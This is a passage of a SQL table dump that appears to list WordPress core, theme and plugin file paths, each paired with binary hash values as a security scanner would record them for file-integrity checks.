�\'���R\'n�7s�b3|','',0,'?'),('�����k2�n���','wp-content/plugins/wp-cerber/cerber-scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�\nm�/̛�XI','��c��`�Rd~��R����z�A�ʌy�U7','',0,'?'),('��YA�m���<S�9','wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/dialog-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�д�u-����V�[�','C�?�&�\":�z�@�T4%��W)��U��','',0,'?'),('��d�I�Kƹ�v\Z�0�','wp-content/plugins/wordpress-seo/admin/views/user-profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dl��1�{ᛛe�Xs','U�G����L<�Y���\r���s�u���0�','',0,'?'),('��v�E,�-O�{���','wp-includes/link-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l?,�����w��DU�','&i�>J<������GC�8�>r�h�ು�A','',0,'?'),('����{�@�q��mu','wp-content/themes/twentytwentyone/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��E�50Q��D=�l�','�2&���.����(SG�l���^�N��C&/ρ�','',0,'?'),('��o���?��ݬ���','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Nw�?���Z��','�u,^�~�U�H& GwɢӴJ5V�x��$���)','',0,'?'),('�!�LT�3��i��x�','wp-admin/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B~-���<d�4g','��·\"7u�9N��kŎ�����!9�.��','',0,'?'),('�#,g ��\\��\r͜��','wp-content/uploads/2021/08/home-improvements-768x527.jpg',0,'x�X�:���%·�8�)','x�X�:���%·�8�)','���̓��[�|�8\n\"c��6��xȑ�w��','',0,'?'),('�/�}��¦��kA�Zj','wp-includes/blocks/query-pagination/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ֺƺ��g���?�','1B�O=����.��~��H?l2�T���͌XT�','',0,'?'),('�54�k��\r�nmĞ)|�','wp-content/uploads/2019/08/Case-study-updraft-pre-smush-original.jpg',0,'KM6h�k�P�q���','KM6h�k�P�q���','��q�4��[3|����l�1�r���\"�#�^�O','',0,'?'),('�=`�:������x~��','wp-includes/blocks/site-logo/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Md�O�E1�����z�C�','�G4�&�S�y�(�FH�����Ԑ���','',0,'?'),('�M�Tq&[?��>칊�\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�9+�\"��+��','B��m��N��h�����stN��jAS4X\0$','',0,'?'),('�M����z�ŭY���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('�Vd ]�=M[[ٿ���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�nr�\'U���o{��','�BS�?jP����0h~q��G�^K�ew�vO','',0,'?'),('�V�ڮ����M��jӁ','wp-includes/js/plupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�j#����J艗�%�O','wp-content/themes/vega/sample/images/cta-parallax-bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/��kqd:o`�N','W�;��S�~���U*ϐ�8\Z���{w0x�k','',0,'?'),('���i��n�j/�r��','wp-includes/js/dist/i18n.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˭N�]��!e�=F','>+W��x��Lߤ�H�<ա�)8�a�$]��Y�=','',0,'?'),('́ԑ�A�Ha]�\':�','wp-includes/blocks/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L����K�\"Ќ�/n','�j�ba�+���{�j�Ȉ�uYYJb(D,�p�','',0,'?'),('̅�{�愵�q�I6��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/UriResolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�0 ]NO����jP�','�����ü,�������\"y�AQM,T+S�','',0,'?'),('̋��q�B3a�Y��-�','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0`\'}�(���b���A#','c,�Bp�2�8���0j��7}hp-��宆','',0,'?'),('̏ȩ�2)VccQ92G|','wp-content/plugins/wordfence/js/wfglobal.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jf\'�?g�m:���','X�c\Z]R@���1�qw�)�kl�Q���Q�','',0,'?'),('̙~�Ȍî+���byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�숊z��;5!��','�D�\Z���L�ޠΔa��]n�\n���L&�\n','',0,'?'),('̟�n�VڰP*x�zy�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post_type/post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�8��7)X','ߕ�_)�\\����8@֝o��b��5�my���','',0,'?'),('̸����-]\Z���n�','wp-includes/sodium_compat/src/Core/Ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k9�wZ��~�� ��\'',' z�`WN?]�ӟ�B,K���Jl��W��>k�','',0,'?'),('̽� ���X�$oB�','wp-content/plugins/akismet/_inc/akismet.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�g:�r�$uV�|I','���)�3$�D|Ժ�L�N���Hd���Ti�','',0,'?'),('�Ê5ff�;,G!\'��\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<��:۶H\n�=|�','H�/������u7�{�UX\nyC��)�����]','',0,'?'),('�����\";+�\rxu���w','wp-includes/js/mediaelement/renderers/vimeo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('�NJ�E�v�c,�صyS^','wp-includes/images/crystal/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('��-@��pKG�[za�@�','wp-content/uploads/2019/10/plumbing1-300x250.jpg',0,'��[�һ)IS��լ','��[�һ)IS��լ','��^Y�;�v�\'�ˀ��\0�T/�wr��(-+ӍD$','',0,'?'),('��J�{�<���M�','wp-content/themes/vega/assets/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Rq��(#2\':','�^�a}��M���\Zө� ��ܗ2d���,\Z�','',0,'?'),('��M\\U2�����x]{8','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/PromiseInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�Fɣ��S씋��','r�e R֭�ރ7wT�/8�PIC_�O�V\'��','',0,'?'),('�\rZ\0�J=\Z��nk�','wp-content/plugins/wordpress-seo/admin/menu/class-base-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��<}�k�ۑX','�X�8�����+k�0B�/��$�~�<BΫ�W�','',0,'?'),('���r�Px�-�\n��0','wp-content/themes/vega/sample/images/cta-parallax-bg2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/��kqd:o`�N','W�;��S�~���U*ϐ�8\Z���{w0x�k','',0,'?'),('����p�j֛`��w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���Vf�D�\\1��f','��3���?��u)0�Űa�8t����gH���','',0,'?'),('�n �}V-����I�','wp-content/themes/twentytwenty/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\Z�)�ې��P|s%�','u�[�\'\nn����RX�o���ӦO�|u-�@','',0,'?'),('�d���lP�O�I�','wp-admin/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DlR����=���@n','ٔ�fİ�� �qRK/�h��XٱVJH&k�HPB','',0,'?'),('�)����\0�e�_�5=�','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Q ����f��7�F','�Ҏ��E����؊>^!j��\0O���ca��^��','',0,'?'),('�2)Ƿ\0� ��d�CCj','wp-content/uploads/2019/08/electrician-150x150.jpg',0,'�h`��:��;/\'��[','�h`��:��;/\'��[','��S�쟵w�kv0AC�Q�&���h��SO�','',0,'?'),('�4g�43�!�B\\ꟑ�','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-readability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����j�fK_e�Rݜs','���w2�)�##F��V���}ք� ���','',0,'?'),('�K=�X�a:�\'5�','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),('�Mu��/t����U\n�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-handle-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r\r�2��a\'����','�F�\'+;��/d�3�$˘��� ĺ$~��m','',0,'?'),('�^&��`R�y����J','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}n�3;g)���','\nj�^�����C�(��UU�i\'9�O','',0,'?'),('�b�5��>��M%��','wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720-300x250.jpg',0,'O\Z���r�f}:��T�','O\Z���r�f}:��T�','`�=Lq�\'eJ��2��d�ܨ���F�x','',0,'?'),('�dy�ɘ3�����','wp-content/plugins/wordpress-seo/src/integrations/front-end/open-graph-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��]��+��� ���',')v��:�0�;�����}m�ж4\0�����D��','',0,'?'),('�m��L0N\"�T~�b�','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z����.�+�j','�i��D�AJ�ψ;v,gc�%��� ^#','',0,'?'),('�n\0pp���CU\0d�!�','wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720-150x150.jpg',0,'�S`Ӂır~�b��','�S`Ӂır~�b��','JF?��ǚ���=�,.����-�4�*�X��X$\0','',0,'?'),('�w�9=�_\"h%��v','wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�6��9�A:ET�','\"�w(\r�ħE��M��G�x�Y[��\"��=','',0,'?'),('͎3ע�Jyn�ĀM�','wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nq*��ZF�)2�','�&4\"\rQ�jX�mN\"��?P�o��\\��?���','',0,'?'),('͓�Y�36��l�Y��','wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('͞\r�w����_\Z��','wp-content/uploads/2016/11/roof-plate-227x150.jpg',0,'�$8�j��%���j','�$8�j��%���j','-��HG��;d���X:ٓ��\n�����+\'�?','',0,'?'),('ͤ8B���¸]��E|','wp-content/plugins/wp-cerber/assets/flags/ky.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M� �d�pV�,�d�','��QP�8�TG�{jrNK�-��,�/l�j ��','',0,'?'),('ͪu�owsFC�G[c��','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8^pي�Y�[,��F.','$vx%��c���7I\\��%����TH˞� ','',0,'?'),('Ͷ�jʃఱ���-�','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:د_x��O0�8���X','�[�|�r�;�������Ƹ����l�b��� Q','',0,'?'),('ͽ3��=��O�G�|~�','wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('��y�Uq���hŝ�','wp-content/plugins/wordpress-seo/inc/class-wpseo-rank.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�[_j��FH;',',�9�<�m_fe\0a�)#�-�0�q�ʥ�iK�Q�1','',0,'?'),('�ϘFvD�̫H�','wp-content/plugins/wp-cerber/assets/flags/tg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f/f�|f~�8','=JUV�1H���kE����OZ�oD\\��','',0,'?'),('��3�����F�<��8','wp-includes/js/underscore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��PS�)��(�%��','T�����W�d�FɼA��ۗ����-�g�z�� ','',0,'?'),('��S�>s�U)����H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('���j(g��~jU#��','wp-admin/includes/class-wp-filesystem-ssh2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*;h��TM�yI�','S�}%+m�<��TY9�@���D�[����X�y��f\\','',0,'?'),('�u臉�Q�p�0t','wp-content/plugins/wordpress-seo/src/routes/indexing-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����|�ޝD��K��K','E\Z͝�������Ѹy\r,lL�vmzE\Z�H����?','',0,'?'),('� ��Mu�)`��>�2','wp-content/themes/twentytwentyone/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��_@$�k\n�m�T5`','+p�>��?9���� �����v��=M|��','',0,'?'),('�%r&I+�k`�>��','wp-content/plugins/wordpress-seo/src/exceptions/indexable/indexable-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��@e-X8�.T�','L����o��ۥ��>��?�B̫fR�ۉ\'@�','',0,'?'),('�(��6Ya\'ϣ��','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-site-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s*�@v�0�z�f�i','9ޱ�1��3=e$�d>i��0C\\־���-�:/','',0,'?'),('�G�6�&���A��+','wp-content/plugins/redirection/matches/custom-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z���J{���HZ>��P','Yg=f�-l)jT�����fu\0�ޠ1�9�P','',0,'?'),('�N: ������@�kς','wp-content/themes/twentytwentyone/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�Ɓ.����o���O#','d�{�_�U��R7I���o�(�~�6,\rT���\n��','',0,'?'),('�T�\\�%�E�x1�','wp-content/languages/en_GB-0cc31205f20441b3df1d1b46100f6b8d.json',0,'�Rs���M���bj7d','�Rs���M���bj7d','#n_�i�j��{K�����i�j� �(��','',0,'?'),('�W���-�9�|�V(','wp-content/uploads/wp-cerber-VDO6QC1K8XALYHJ4E5/.htaccess',0,'\\Ƞ+�a[�Z�ˢ�','\\Ƞ+�a[�Z�ˢ�',' ��HQI�qz�ڤ�p�9�C4>H���3���G','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�z)Ue���$t��\r','��;-�f�N��I�Y��Yڲ���e��\r�','',0,'?'),('�_)-�]�ˌkO ��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)���H�G���>�','ٚ+��\"�Bt��� \'S_��̄E�s��_�)^�','',0,'?'),('�`^Eq,{�a\n�����','wp-content/uploads/2019/08/Case-study-768x512.jpg',0,'I���F�Mqt�\'E&�H','I���F�Mqt�\'E&�H','��;���\nMz���p��=���Ы�l\0�J̰','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�|��f�����,2�T ','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�3&�Е��(6�&�','H�4\0�p�B��a��m�f���SU\n��T','',0,'?'),('��-G�*���D1�','wp-content/plugins/wordpress-seo/src/memoizers/meta-tags-context-memoizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Lz8N��,���K�6*','*����9P���Y�3+l�F�X�S�d.�/�','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('α�Z ��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k���d�`�>�C��','��a��5�ÔC�ms�kY�v��y4�V����','',0,'?'),('���+4#�E����Wl�3','wp-content/plugins/wp-cerber/assets/flags/ma.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E3ц�Җ`?n~','�Lx����9�yՌ�6luт�l�Ca�e@���','',0,'?'),('��D/T�3�D\n�=wP.','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-post-type-archive-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(-^��j�!i���f��','�q\0\nP�dʓ���L����>�^�U���\\<��','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('��5�F�,�Yښ.1�.�','wp-content/plugins/wordpress-seo/images/alert-warning-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WH}�理���Al~','����2̯���%S=�t؈�n��=�Wc','',0,'?'),('��������\n�P','wp-includes/blocks/quote/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=9>V-@`鮏q��C',']w!��D )g��\Z����⸓9��f��ɑ���','',0,'?'),('��}6A9*���4�','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-separator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����=8����^ ','��@�C˶)�v�\0T-Y~D���v�Cv��rM�z','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('��\n\0�0{���','wp-content/plugins/wordpress-seo/src/helpers/post-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���巤�q4�v+^�','��U�L�f�Y,�F�TƢ����&5�,D7�P#c','',0,'?'),('��$e�&�gq�i�m�','wp-content/themes/twentytwenty/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���L�*��H��u���','~��д\"�\'6���xg�k�?$��u�J{R^','',0,'?'),('�!�h��R��ah�T�C\0','wp-content/plugins/wordfence/css/wfselect2.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����3,B�V���','��ڑ�t4U��\"�;�t�7�\Z�Jy�rb@','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��+N�}G�r��q','� )�Y��H��\n\0i�3_:):���Q^�','',0,'?'),('�26�6�# S[h(\\��','wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"w1�jym���`�<�',')C����n�Я���p}ϊ2���g�S���7{','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�_q ^��<�8��:� ','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3A���,�G�_��Z���','dH\r�e�O��DW�·Om�.�+GkC/������','',0,'?'),('�c��8��ڲ��$n','wp-content/plugins/wordpress-seo/images/woo_plugin_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n�q�F0�芼�w','����w�A\0\'Zw ��d=�ؼ]\'ax���B','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fvb̵|�\\V�g�','O��ـ%�߿���\'Z3�p*���-�','',0,'?'),('ϱ�}w&����M)bo4','wp-content/languages/en_GB-2b390f85a3048c5b4255fb45960b6514.json',0,'&źA�\"_�\nP�Qr','&źA�\"_�\nP�Qr','Fy��m�~��(m1!֦��������{W�1','',0,'?'),('϶c:�{�:˚�y�Wk','wp-content/plugins/disable-gutenberg/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h��טR�D!�X','�����J�5Ox��%cQ�jL��a�a,T ','',0,'?'),('ϼ���5�\r\"|c��Ԩ�','wp-content/uploads/2019/12/pexels-photo-300x250.jpg',0,'���O9����`�','���O9����`�','Z�b<d~�{�\n��@���hRW��','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('��MЛ��ϣ~&$�','wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{4��i�b�T��ڒ','v\ZE;�}7�۰���%`1\'��3-ݡ��x','',0,'?'),('�֎6�b9�a�#s+W','wp-content/plugins/wordpress-seo/admin/class-admin-asset-seo-location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��n庭��l�%NS','����*e�4m<�5�1t�Al�M�L�GBK��','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������YA2M�/','�ޱhz`���X~�>:XBn|4�,�̸���f�','',0,'?'),('�ݚ�y.\0��i�','wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fwOm`-|\"e�1�I@�','[^��BA�\r�c��D��7�\n��q���DO��8','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��Y���a��y',';9ϛ%�ٛۧ�p��G���r&Ze�;eO;���j','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �,Ǿ ��YQA�k','�7T�����Ə��aY���,���X��8�','',0,'?'),('�@��AO= �yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('��]mٲ� ▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩ ��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('����gs��)݅','wp-includes/blocks/latest-posts/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�\r6H�O\0HXv1�\'�','����%�yO�5�%��l���hb���Hc�','',0,'?'),('�\Z��YÅjxU�#�6�k','wp-content/plugins/wp-cerber/assets/flags/mx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�W6;���%����','E���&8��0�`�����\ZQ3`���w]#�ע','',0,'?'),('�!�Z��}�r��+NJ�','wp-content/themes/vega/customize/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��[셉�{^�ˋ','ԍ���eh���:(�C1�\r��W~�Ō� �p','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�0NJuƥ������','wp-content/plugins/wordpress-seo/languages/yoast-components-bg_BG.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hB��C^_���D �',';f}�X�O�kLV�+Ȣ���-u�G1�u�i[�','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\nP?^��u:� ','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('�B�WC>*f�j��j�R','wp-content/plugins/wordpress-seo/languages/wordpress-seo-pl_PL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�Isj@ɽ�կ���!','�SJ~��1P��>��-����Ҫ��Ѽۈ','',0,'?'),('�S�Y���+�L��4��','wp-content/plugins/wordpress-seo/js/dist/languages/sv-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�G[2)�/i}���','ȑ���͔��|Q�����N����mtT���','',0,'?'),('�Tq%<>z�բ�','wp-content/plugins/wp-cerber/assets/flags/bv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('�ac��I}�f�Ȅ�;','wp-content/plugins/wordpress-seo/admin/views/tool-bulk-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"+��ݔ)W2�','�Dn�� N��q��C���7��s)ew��{��B�','',0,'?'),('�x�����<�\n���','wp-content/plugins/wordpress-seo/admin/ryte/class-ryte.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �H��:��PH�?h�','�$.oh��v#\Z��aC�E�ڂ���H�\n','',0,'?'),('Њ֥��ݴ����(','wp-content/languages/plugins/wordpress-seo-en_GB-e7a3bef8529a1b3cb15b74ccda58a66f.json',0,'[���;�&|i�H.#','[���;�&|i�H.#','�rL+T����R��?��X��s���{�N$','',0,'?'),('Е\rH��´7��','wp-content/plugins/redirection/locale/redirection-en_ZA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k^dα&6�Z��',' ��\\4�~��> �>��䀏Ir�x���o��{','',0,'?'),('Сr�w|\nO?���W�Vn','wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j_1�e�;\Z��\"�ô','\r��$�- 